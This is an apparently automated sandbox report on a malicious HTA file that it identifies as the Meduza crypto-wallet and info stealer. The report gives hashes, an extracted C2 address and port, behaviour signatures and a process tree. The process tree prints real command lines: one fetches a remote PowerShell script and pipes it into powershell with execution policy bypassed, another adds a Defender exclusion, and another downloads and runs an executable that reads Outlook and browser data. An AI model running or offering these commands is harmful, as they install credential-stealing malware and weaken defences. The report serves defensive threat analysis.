Analysis

  • max time kernel
    93s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-12-2024 07:07

General

  • Target

    script.hta

  • Size

    551B

  • MD5

    4041595b42e7b6e2ce5965cb76ea7da1

  • SHA1

    401723ee1ac651ad359b89dd7e3cefea91d6aaa9

  • SHA256

    054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f

  • SHA512

    84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19

Malware Config

Extracted

Family

meduza

C2

193.3.19.151

Attributes
  • anti_dbg

    true

  • anti_vm

    true

  • build_name

    hdont

  • extensions

    .txt

  • grabber_max_size

    4.194304e+06

  • port

    15666

  • self_destruct

    false

Signatures

  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 1 IoCs
  • Meduza family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\script.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4920
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\SysWOW64\curl.exe
        curl -s http://147.45.47.15/script.ps1
        3⤵
          PID:2084
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command -
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4476
          • C:\Windows\Temp\Launcher.exe
            "C:\Windows\Temp\Launcher.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4100
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ppjsh4jq.puq.exe'"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4828
            • C:\Windows\Temp\ppjsh4jq.puq.exe
              "C:\Windows\Temp\ppjsh4jq.puq.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1452

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      c580727fc0a7a733ea6a446b67ca63f7

      SHA1

      ebdd57fca25df0f759dec07c5382d560df7600c2

      SHA256

      369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073

      SHA512

      2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      8eb76a35570162afdcba81c3159cf0fb

      SHA1

      5a48dbc6ee495112d08224e009b16ef242f565d3

      SHA256

      3e26630e7998201363b1a295789aa98b058fc7d68cd4e42a478bdad6fad24004

      SHA512

      ec91b54ef1fdb61f696f149483ed3a4c93c0e1b1929e8be62f1981aabf0888b92560fed96119e60e4e5885e457ca8e63ecbd855c9dd1431585fcb55e755ffd8f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2lpi5a2x.phz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\Temp\IVIEWERS.DLL

      Filesize

      6KB

      MD5

      e017be56699801dc89a8d6d1724eb633

      SHA1

      a7f7aae4744210db8ebaf4da06c167357bc71eca

      SHA256

      aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564

      SHA512

      2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8

    • C:\Windows\Temp\Launcher.exe

      Filesize

      201KB

      MD5

      2696d944ffbef69510b0c826446fd748

      SHA1

      e4106861076981799719876019fe5224eac2655c

      SHA256

      a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

      SHA512

      c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

    • C:\Windows\Temp\ppjsh4jq.puq.exe

      Filesize

      1.2MB

      MD5

      c6813da66eba357d0deaa48c2f7032b8

      SHA1

      6812e46c51f823ff0b0ee17bfce0af72f857af66

      SHA256

      1420f60f053c3ea5605239ee431e5f487245108b1c01be75d16b5246156fa178

      SHA512

      19391c6b12ba8f34a5faf326f8986ef8de4729d614d72bf438c6efa569b3505159ca55f580fe2a02642e5e7a0f1b38a7a9db9f0d66d67ba548d84c230183159e

    • memory/1836-72-0x00000000076B0000-0x00000000076BA000-memory.dmp

      Filesize

      40KB

    • memory/1836-71-0x0000000007520000-0x00000000075C3000-memory.dmp

      Filesize

      652KB

    • memory/1836-77-0x00000000078D0000-0x00000000078D8000-memory.dmp

      Filesize

      32KB

    • memory/1836-76-0x00000000079A0000-0x00000000079BA000-memory.dmp

      Filesize

      104KB

    • memory/1836-75-0x0000000007890000-0x00000000078A4000-memory.dmp

      Filesize

      80KB

    • memory/1836-74-0x0000000007880000-0x000000000788E000-memory.dmp

      Filesize

      56KB

    • memory/1836-73-0x0000000007850000-0x0000000007861000-memory.dmp

      Filesize

      68KB

    • memory/1836-57-0x0000000005D20000-0x0000000006074000-memory.dmp

      Filesize

      3.3MB

    • memory/1836-70-0x0000000006910000-0x000000000692E000-memory.dmp

      Filesize

      120KB

    • memory/1836-60-0x0000000071230000-0x000000007127C000-memory.dmp

      Filesize

      304KB

    • memory/1836-59-0x00000000074D0000-0x0000000007502000-memory.dmp

      Filesize

      200KB

    • memory/1836-58-0x0000000006400000-0x000000000644C000-memory.dmp

      Filesize

      304KB

    • memory/4100-46-0x0000000075510000-0x000000007551A000-memory.dmp

      Filesize

      40KB

    • memory/4100-45-0x0000000004AF0000-0x0000000004AFA000-memory.dmp

      Filesize

      40KB

    • memory/4476-25-0x0000000007E50000-0x0000000007EE6000-memory.dmp

      Filesize

      600KB

    • memory/4476-21-0x0000000008000000-0x000000000867A000-memory.dmp

      Filesize

      6.5MB

    • memory/4476-40-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/4476-3-0x00000000057D0000-0x0000000005DF8000-memory.dmp

      Filesize

      6.2MB

    • memory/4476-5-0x0000000005F30000-0x0000000005F96000-memory.dmp

      Filesize

      408KB

    • memory/4476-27-0x0000000008C30000-0x00000000091D4000-memory.dmp

      Filesize

      5.6MB

    • memory/4476-26-0x0000000007DF0000-0x0000000007E12000-memory.dmp

      Filesize

      136KB

    • memory/4476-6-0x0000000005FA0000-0x0000000006006000-memory.dmp

      Filesize

      408KB

    • memory/4476-22-0x00000000079A0000-0x00000000079BA000-memory.dmp

      Filesize

      104KB

    • memory/4476-4-0x0000000005640000-0x0000000005662000-memory.dmp

      Filesize

      136KB

    • memory/4476-0-0x000000007524E000-0x000000007524F000-memory.dmp

      Filesize

      4KB

    • memory/4476-20-0x0000000007900000-0x0000000007976000-memory.dmp

      Filesize

      472KB

    • memory/4476-19-0x0000000007750000-0x0000000007794000-memory.dmp

      Filesize

      272KB

    • memory/4476-18-0x00000000066C0000-0x000000000670C000-memory.dmp

      Filesize

      304KB

    • memory/4476-17-0x0000000006610000-0x000000000662E000-memory.dmp

      Filesize

      120KB

    • memory/4476-16-0x0000000006110000-0x0000000006464000-memory.dmp

      Filesize

      3.3MB

    • memory/4476-1-0x0000000003030000-0x0000000003066000-memory.dmp

      Filesize

      216KB

    • memory/4476-2-0x0000000075240000-0x00000000759F0000-memory.dmp

      Filesize

      7.7MB

    • memory/4828-90-0x0000000006270000-0x00000000062BC000-memory.dmp

      Filesize

      304KB

    • memory/4828-88-0x0000000005700000-0x0000000005A54000-memory.dmp

      Filesize

      3.3MB